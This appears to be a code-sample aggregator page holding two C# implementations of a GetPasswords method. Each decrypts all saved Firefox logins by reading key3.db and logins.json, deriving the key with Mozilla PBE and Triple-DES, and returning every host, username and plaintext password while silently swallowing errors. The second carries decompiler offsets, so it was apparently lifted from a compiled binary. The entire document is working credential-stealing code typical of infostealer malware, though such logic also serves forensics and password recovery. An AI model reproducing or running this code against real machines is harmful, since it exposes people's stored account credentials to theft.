Exemple #1
0
 public List <BrowserLog> GetPasswords()
 {
     try
     {
         List <BrowserLog> browserLogList = new List <BrowserLog>();
         DataTable         dataTable      = new DataTable();
         Asn1Der           asn1Der        = new Asn1Der();
         BerkeleyDB        berkeleyDb     = new BerkeleyDB(this.Key3Db);
         PasswordCheck     passwordCheck  = new PasswordCheck(berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p => p.Key.Equals("password-check"))).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", string.Empty));
         string            hexString1     = berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p => p.Key.Equals("global-salt"))).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", string.Empty);
         MozillaPBE        mozillaPbe1    = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString1), Encoding.ASCII.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
         mozillaPbe1.Compute();
         TripleDESHelper.DESCBCDecryptor(mozillaPbe1.Key, mozillaPbe1.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
         string hexString2 = berkeleyDb.Keys.Where <KeyValuePair <string, string> >((Func <KeyValuePair <string, string>, bool>)(p =>
         {
             if (!p.Key.Equals("global-salt") && !p.Key.Equals("Version"))
             {
                 return(!p.Key.Equals("password-check"));
             }
             return(false);
         })).Select <KeyValuePair <string, string>, string>((Func <KeyValuePair <string, string>, string>)(p => p.Value)).FirstOrDefault <string>().Replace("-", "");
         Asn1DerObject asn1DerObject1 = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
         MozillaPBE    mozillaPbe2    = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString1), Encoding.ASCII.GetBytes(string.Empty), asn1DerObject1.objects[0].objects[0].objects[1].objects[0].Data);
         mozillaPbe2.Compute();
         byte[]        dataToParse    = TripleDESHelper.DESCBCDecryptorByte(mozillaPbe2.Key, mozillaPbe2.IV, asn1DerObject1.objects[0].objects[1].Data);
         Asn1DerObject asn1DerObject2 = asn1Der.Parse(dataToParse);
         Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
         byte[]        key            = new byte[24];
         if (asn1DerObject3.objects[0].objects[3].Data.Length > 24)
         {
             Array.Copy((Array)asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, (Array)key, 0, 24);
         }
         else
         {
             key = asn1DerObject3.objects[0].objects[3].Data;
         }
         foreach (Login login in File.ReadAllText(this.LoginJson).ParseJSON <RootObject>().logins)
         {
             Asn1DerObject asn1DerObject4 = asn1Der.Parse(Convert.FromBase64String(login.encryptedUsername));
             Asn1DerObject asn1DerObject5 = asn1Der.Parse(Convert.FromBase64String(login.encryptedPassword));
             string        str1           = Regex.Replace(TripleDESHelper.DESCBCDecryptor(key, asn1DerObject4.objects[0].objects[1].objects[1].Data, asn1DerObject4.objects[0].objects[2].Data), "[^\\u0020-\\u007F]", string.Empty);
             string        str2           = Regex.Replace(TripleDESHelper.DESCBCDecryptor(key, asn1DerObject5.objects[0].objects[1].objects[1].Data, asn1DerObject5.objects[0].objects[2].Data), "[^\\u0020-\\u007F]", string.Empty);
             BrowserLog    browserLog     = new BrowserLog()
             {
                 Host     = string.IsNullOrWhiteSpace(login.hostname) ? "UNKOWN" : login.hostname,
                 Login    = string.IsNullOrWhiteSpace(str1) ? "UNKOWN" : str1,
                 Password = string.IsNullOrWhiteSpace(str2) ? "UNKOWN" : str2
             };
             if (browserLog.Login != "UNKOWN" && browserLog.Password != "UNKOWN" && browserLog.Host != "UNKOWN")
             {
                 browserLogList.Add(browserLog);
             }
         }
         return(browserLogList);
     }
     catch
     {
         return(new List <BrowserLog>());
     }
 }
Exemple #2
0
        // Token: 0x06000168 RID: 360 RVA: 0x00007B94 File Offset: 0x00005D94
        public List <Log> GetPasswords()
        {
            List <Log> result;

            try
            {
                List <Log>    list          = new List <Log>();
                DataTable     dataTable     = new DataTable();
                Asn1Der       asn1Der       = new Asn1Der();
                BerkeleyDB    berkeleyDB    = new BerkeleyDB(this.Key3Db);
                PasswordCheck passwordCheck = new PasswordCheck((from p in berkeleyDB.Keys
                                                                 where p.Key.Equals("password-check")
                                                                 select p.Value).FirstOrDefault <string>().Replace("-", string.Empty));
                string hexString = (from p in berkeleyDB.Keys
                                    where p.Key.Equals("global-salt")
                                    select p.Value).FirstOrDefault <string>().Replace("-", string.Empty);
                MozillaPBE mozillaPBE = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.ASCII.GetBytes(string.Empty), ByteHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt));
                mozillaPBE.Compute();
                string text       = TripleDESHelper.DESCBCDecryptor(mozillaPBE.Key, mozillaPBE.IV, ByteHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck));
                string hexString2 = (from p in berkeleyDB.Keys
                                     where !p.Key.Equals("global-salt") && !p.Key.Equals("Version") && !p.Key.Equals("password-check")
                                     select p.Value).FirstOrDefault <string>().Replace("-", "");
                Asn1DerObject asn1DerObject = asn1Der.Parse(ByteHelper.ConvertHexStringToByteArray(hexString2));
                MozillaPBE    mozillaPBE2   = new MozillaPBE(ByteHelper.ConvertHexStringToByteArray(hexString), Encoding.ASCII.GetBytes(string.Empty), asn1DerObject.objects[0].objects[0].objects[1].objects[0].Data);
                mozillaPBE2.Compute();
                byte[]        dataToParse    = TripleDESHelper.DESCBCDecryptorByte(mozillaPBE2.Key, mozillaPBE2.IV, asn1DerObject.objects[0].objects[1].Data);
                Asn1DerObject asn1DerObject2 = asn1Der.Parse(dataToParse);
                Asn1DerObject asn1DerObject3 = asn1Der.Parse(asn1DerObject2.objects[0].objects[2].Data);
                byte[]        array          = new byte[24];
                bool          flag           = asn1DerObject3.objects[0].objects[3].Data.Length > 24;
                if (flag)
                {
                    Array.Copy(asn1DerObject3.objects[0].objects[3].Data, asn1DerObject3.objects[0].objects[3].Data.Length - 24, array, 0, 24);
                }
                else
                {
                    array = asn1DerObject3.objects[0].objects[3].Data;
                }
                RootObject rootObject = File.ReadAllText(this.LoginJson).ParseJSON <RootObject>();
                foreach (Login login in rootObject.logins)
                {
                    Asn1DerObject asn1DerObject4 = asn1Der.Parse(Convert.FromBase64String(login.encryptedUsername));
                    Asn1DerObject asn1DerObject5 = asn1Der.Parse(Convert.FromBase64String(login.encryptedPassword));
                    string        text2          = TripleDESHelper.DESCBCDecryptor(array, asn1DerObject4.objects[0].objects[1].objects[1].Data, asn1DerObject4.objects[0].objects[2].Data);
                    text2 = Regex.Replace(text2, "[^\\u0020-\\u007F]", string.Empty);
                    string text3 = TripleDESHelper.DESCBCDecryptor(array, asn1DerObject5.objects[0].objects[1].objects[1].Data, asn1DerObject5.objects[0].objects[2].Data);
                    text3 = Regex.Replace(text3, "[^\\u0020-\\u007F]", string.Empty);
                    Log log = new Log
                    {
                        URL      = (string.IsNullOrWhiteSpace(login.hostname) ? "UNKOWN" : login.hostname),
                        Login    = (string.IsNullOrWhiteSpace(text2) ? "UNKOWN" : text2),
                        Password = (string.IsNullOrWhiteSpace(text3) ? "UNKOWN" : text3)
                    };
                    bool flag2 = log.Login != "UNKOWN" && log.Password != "UNKOWN" && log.URL != "UNKOWN";
                    if (flag2)
                    {
                        list.Add(log);
                    }
                }
                result = list;
            }
            catch
            {
                result = new List <Log>();
            }
            return(result);
        }